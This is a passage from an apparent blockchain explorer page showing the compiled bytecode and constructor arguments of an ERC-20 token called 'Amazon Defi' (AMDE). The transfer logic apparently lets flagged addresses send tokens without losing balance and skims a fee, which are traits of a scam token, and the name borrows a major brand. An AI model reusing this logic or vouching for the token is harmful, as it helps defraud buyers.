d35565b91506113ee826113ad565b602082019050919050565b60006020820190508181036000830152611412816113d6565b9050919050565b600061142482610e3f565b915061142f83610e3f565b925082820390508181111561144757611446611096565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061148782610e3f565b915061149283610e3f565b9250826114a2576114a161144d565b5b828204905092915050565b60006114b882610e3f565b91506114c383610e3f565b92508282026114d181610e3f565b915082820484148315176114e8576114e7611096565b5b509291505056fea264697066735822122031d7db34790973ba670591c0b4e085a70e0608adf2abe090876c8bd15777af5964736f6c63430008110033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d0000000000000000000000005c1eb5dc7b57453eb65733c485296c592e3c6311000000000000000000000000000000000000000000000000000000000000000b416d617a6f6e20446566690000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004414d444500000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a257806395d89b411161007157806395d89b41146102be578063a457c2d7146102dc578063a9059cbb1461030c578063dd62ed3e1461033c578063f2fde38b1461036c5761010b565b806370a0823114610236578063715018a6146102665780638c517820146102705780638da5cb5b146102a05761010b565b8063313ce567116100de578063313ce567146101ac57806339509351146101ca5780633eaaf86b146101fa5780635bc0f8f8146102185761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610388565b6040516101259190610dba565b60405180910390f35b61014860048036038101906101439190610e75565b61041a565b6040516101559190610ed0565b60405180910390f35b61016661043d565b6040516101739190610efa565b60405180910390f35b61019660048036038101906101919190610f15565b610447565b6040516101a39190610ed0565b60405180910390f35b6101b4610476565b6040516101c19190610f84565b60405180910390f35b6101e460048036038101906101df9190610e75565b61047f565b6040516101f19190610ed0565b60405180910390f35b6102026104b6565b60405161020f9190610efa565b60405180910390f35b6102206104bc565b60405161022d9190610efa565b60405180910390f35b610250600480360381019061024b9190610f9f565b6104c2565b60405161025d9190610efa565b60405180910390f35b61026e61050a565b005b61028a60048036038101906102859190610f9f565b610592565b6040516102979190610efa565b60405180910390f35b6102a86105aa565b6040516102b59190610fdb565b60405180910390f35b6102c66105d4565b6040516102d39190610dba565b60405180910390f35b6102f660048036038101906102f19190610e75565b610666565b6040516103039190610ed0565b60405180910390f35b61032660048036038101906103219190610e75565b6106dd565b6040516103339190610ed0565b60405180910390f35b61035660048036038101906103519190610ff6565b610700565b6040516103639190610efa565b60405180910390f35b61038660048036038101906103819190610f9f565b610787565b005b60606003805461039790611065565b80601f01602080910402602001604051908101604052809291908181526020018280546103c390611065565b80156104105780601f106103e557610100808354040283529160200191610410565b820191906000526020600020905b8154815290600101906020018083116103f357829003601f168201915b5050505050905090565b60008061042561087e565b9050610432818585610886565b600191505092915050565b6000600254905090565b60008061045261087e565b905061045f858285610a4f565b61046a858585610adb565b60019150509392505050565b60006009905090565b60008061048a61087e565b90506104ab81858561049c8589610700565b6104a691906110c5565b610886565b600191505092915050565b60025481565b60075481565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61051261087e565b73ffffffffffffffffffffffffffffffffffffffff166105306105aa565b73ffffffffffffffffffffffffffffffffffffffff1614610586576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161057d90611145565b60405180910390fd5b6105906000610c64565b565b60006020528060005260406000206000915090505481565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600480546105e390611065565b80601f016020809104026020016040519081016040528092919081815260200182805461060f90611065565b801561065c5780601f106106315761010080835404028352916020019161065c565b820191906000526020600020905b81548152906001019060200180831161063f57829003601f168201915b5050505050905090565b60008061067161087e565b9050600061067f8286610700565b9050838110156106c4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106bb906111d7565b60405180910390fd5b6106d18286868403610886565b60019250505092915050565b6000806106e861087e565b90506106f5818585610adb565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b61078f61087e565b73ffffffffffffffffffffffffffffffffffffffff166107ad6105aa565b73ffffffffffffffffffffffffffffffffffffffff1614610803576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107fa90611145565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610872576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161086990611269565b60405180910390fd5b61087b81610c64565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108f5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108ec906112fb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610964576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161095b9061138d565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a429190610efa565b60405180910390a3505050565b6000610a5b8484610700565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610ad55781811015610ac7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610abe906113f9565b60405180910390fd5b610ad48484848403610886565b5b50505050565b6000600660008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205403610b7857806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610b709190611419565b925050819055505b6000600754606483610b8a919061147c565b610b9491906114ad565b90508082610ba29190611419565b9150816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610bf291906110c5565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610c569190610efa565b60405180910390a350505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610d64578082015181840152602081019050610d49565b60008484015250505050565b6000601f19601f8301169050919050565b6000610d8c82610d2a565b610d968185610d35565b9350610da6818560208601610d46565b610daf81610d70565b840191505092915050565b60006020820190508181036000830152610dd48184610d81565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610e0c82610de1565b9050919050565b610e1c81610e01565b8114610e2757600080fd5b50565b600081359050610e3981610e13565b92915050565b6000819050919050565b610e5281610e3f565b8114610e5d57600080fd5b50565b600081359050610e6f81610e49565b92915050565b60008060408385031215610e8c57610e8b610ddc565b5b6000610e9a85828601610e2a565b9250506020610eab85828601610e60565b9150509250929050565b60008115159050919050565b610eca81610eb5565b82525050565b6000602082019050610ee56000830184610ec1565b92915050565b610ef481610e3f565b82525050565b6000602082019050610f0f6000830184610eeb565b92915050565b600080600060608486031215610f2e57610f2d610ddc565b5b6000610f3c86828701610e2a565b9350506020610f4d86828701610e2a565b9250506040610f5e86828701610e60565b9150509250925092565b600060ff82169050919050565b610f7e81610f68565b82525050565b6000602082019050610f996000830184610f75565b92915050565b600060208284031215610fb557610fb4610ddc565b5b6000610fc384828501610e2a565b91505092915050565b610fd581610e01565b82525050565b6000602082019050610ff06000830184610fcc565b92915050565b6000806040838503121561100d5761100c610ddc565b5b600061101b85828601610e2a565b925050602061102c85828601610e2a565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061107d57607f821691505b6020821081036110905761108f611036565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006110d082610e3f565b91506110db83610e3f565b92508282019050808211156110f3576110f2611096565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061112f602083610d35565b915061113a826110f9565b602082019050919050565b6000602082019050818103600083015261115e81611122565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006111c1602583610d35565b91506111cc82611165565b604082019050919050565b600060208201905081810360008301526111f0816111b4565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611253602683610d35565b915061125e826111f7565b604082019050919050565b6000602082019050818103600083015261128281611246565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006112e5602483610d35565b91506112f082611289565b604082019050919050565b60006020820190508181036000830152611314816112d8565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611377602283610d35565b91506113828261131b565b604082019050919050565b600060208201905081810360008301526113a68161136a565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006113e3601d83610d35565b91506113ee826113ad565b602082019050919050565b60006020820190508181036000830152611412816113d6565b9050919050565b600061142482610e3f565b915061142f83610e3f565b925082820390508181111561144757611446611096565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061148782610e3f565b915061149283610e3f565b9250826114a2576114a161144d565b5b828204905092915050565b60006114b882610e3f565b91506114c383610e3f565b92508282026114d181610e3f565b915082820484148315176114e8576114e7611096565b5b509291505056fea264697066735822122031d7db34790973ba670591c0b4e085a70e0608adf2abe090876c8bd15777af5964736f6c63430008110033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d0000000000000000000000005c1eb5dc7b57453eb65733c485296c592e3c6311000000000000000000000000000000000000000000000000000000000000000b416d617a6f6e20446566690000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004414d444500000000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : purple (string): Amazon Defi
Arg [1] : report (string): AMDE
Arg [2] : daily (address): 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
Arg [3] : putting (address): 0x5c1eb5dc7b57453EB65733c485296c592e3c6311
-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d
Arg [3] : 0000000000000000000000005c1eb5dc7b57453eb65733c485296c592e3c6311
Arg [4] : 000000000000000000000000000000000000000000000000000000000000000b
Arg [5] : 416d617a6f6e2044656669000000000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [7] : 414d444500000000000000000000000000000000000000000000000000000000
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.